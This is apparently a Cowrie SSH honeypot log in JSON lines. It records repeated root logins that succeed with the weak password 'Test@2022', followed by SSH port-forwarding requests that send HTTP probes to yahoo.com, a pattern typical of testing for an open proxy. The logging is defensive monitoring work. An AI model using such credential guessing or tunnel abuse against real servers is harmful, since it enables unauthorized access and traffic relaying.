{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":32206,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:32206","sensor":"my-vps","timestamp":"2025-08-26T01:00:59.787294Z","session":"c9fe9edb447d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:59.844001Z","src_ip":"213.209.150.239","session":"c9fe9edb447d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:59.901357Z","src_ip":"213.209.150.239","session":"c9fe9edb447d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16375,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7c90b5d3ac2","protocol":"ssh","message":"New connection: 213.209.150.239:16375 (1.2.3.4:22) [session: b7c90b5d3ac2]","sensor":"my-vps","timestamp":"2025-08-26T01:00:59.957164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:59.958447Z","src_ip":"213.209.150.239","session":"b7c90b5d3ac2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:00.015260Z","src_ip":"213.209.150.239","session":"b7c90b5d3ac2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:00.298275Z","src_ip":"213.209.150.239","session":"b7c90b5d3ac2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":16398,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:16398","sensor":"my-vps","timestamp":"2025-08-26T01:01:00.356086Z","session":"b7c90b5d3ac2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:00.412915Z","src_ip":"213.209.150.239","session":"b7c90b5d3ac2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":32021,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:32021","sensor":"my-vps","timestamp":"2025-08-26T01:01:00.567148Z","session":"b7c90b5d3ac2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:00.624022Z","src_ip":"213.209.150.239","session":"b7c90b5d3ac2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:00.682572Z","src_ip":"213.209.150.239","session":"b7c90b5d3ac2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16441,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1ab78716280","protocol":"ssh","message":"New connection: 213.209.150.239:16441 (1.2.3.4:22) [session: c1ab78716280]","sensor":"my-vps","timestamp":"2025-08-26T01:01:00.738123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:00.746932Z","src_ip":"213.209.150.239","session":"c1ab78716280"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:00.795046Z","src_ip":"213.209.150.239","session":"c1ab78716280"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:01.078582Z","src_ip":"213.209.150.239","session":"c1ab78716280"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":29146,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:29146","sensor":"my-vps","timestamp":"2025-08-26T01:01:01.136597Z","session":"c1ab78716280"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:01.193403Z","src_ip":"213.209.150.239","session":"c1ab78716280"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":32047,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:32047","sensor":"my-vps","timestamp":"2025-08-26T01:01:01.351154Z","session":"c1ab78716280"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:01.408058Z","src_ip":"213.209.150.239","session":"c1ab78716280"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:01.466359Z","src_ip":"213.209.150.239","session":"c1ab78716280"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16496,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bbc1582c2e2","protocol":"ssh","message":"New connection: 213.209.150.239:16496 (1.2.3.4:22) [session: 9bbc1582c2e2]","sensor":"my-vps","timestamp":"2025-08-26T01:01:01.521826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:01.522763Z","src_ip":"213.209.150.239","session":"9bbc1582c2e2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:01.579950Z","src_ip":"213.209.150.239","session":"9bbc1582c2e2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:01.864400Z","src_ip":"213.209.150.239","session":"9bbc1582c2e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":7957,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:7957","sensor":"my-vps","timestamp":"2025-08-26T01:01:01.925097Z","session":"9bbc1582c2e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:01.982190Z","src_ip":"213.209.150.239","session":"9bbc1582c2e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":30709,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:30709","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.139631Z","session":"9bbc1582c2e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.196709Z","src_ip":"213.209.150.239","session":"9bbc1582c2e2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.255875Z","src_ip":"213.209.150.239","session":"9bbc1582c2e2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16539,"dst_ip":"1.2.3.4","dst_port":22,"session":"0315017b68a2","protocol":"ssh","message":"New connection: 213.209.150.239:16539 (1.2.3.4:22) [session: 0315017b68a2]","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.301094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.301947Z","src_ip":"213.209.150.239","session":"0315017b68a2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.349692Z","src_ip":"213.209.150.239","session":"0315017b68a2"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":41876,"dst_ip":"1.2.3.4","dst_port":22,"session":"71eb130040ea","protocol":"ssh","message":"New connection: 45.88.8.215:41876 (1.2.3.4:22) [session: 71eb130040ea]","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.475955Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.585974Z","src_ip":"213.209.150.239","session":"0315017b68a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":28277,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:28277","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.634713Z","session":"0315017b68a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.682203Z","src_ip":"213.209.150.239","session":"0315017b68a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":6386,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:6386","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.817542Z","session":"0315017b68a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.865000Z","src_ip":"213.209.150.239","session":"0315017b68a2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.879950Z","src_ip":"45.88.8.215","session":"71eb130040ea"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.880664Z","src_ip":"45.88.8.215","session":"71eb130040ea"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.913604Z","src_ip":"213.209.150.239","session":"0315017b68a2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16588,"dst_ip":"1.2.3.4","dst_port":22,"session":"835f96a7a164","protocol":"ssh","message":"New connection: 213.209.150.239:16588 (1.2.3.4:22) [session: 835f96a7a164]","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.969419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:02.970276Z","src_ip":"213.209.150.239","session":"835f96a7a164"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:03.027598Z","src_ip":"213.209.150.239","session":"835f96a7a164"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:03.310462Z","src_ip":"213.209.150.239","session":"835f96a7a164"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":12276,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:12276","sensor":"my-vps","timestamp":"2025-08-26T01:01:03.367928Z","session":"835f96a7a164"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:03.424880Z","src_ip":"213.209.150.239","session":"835f96a7a164"}
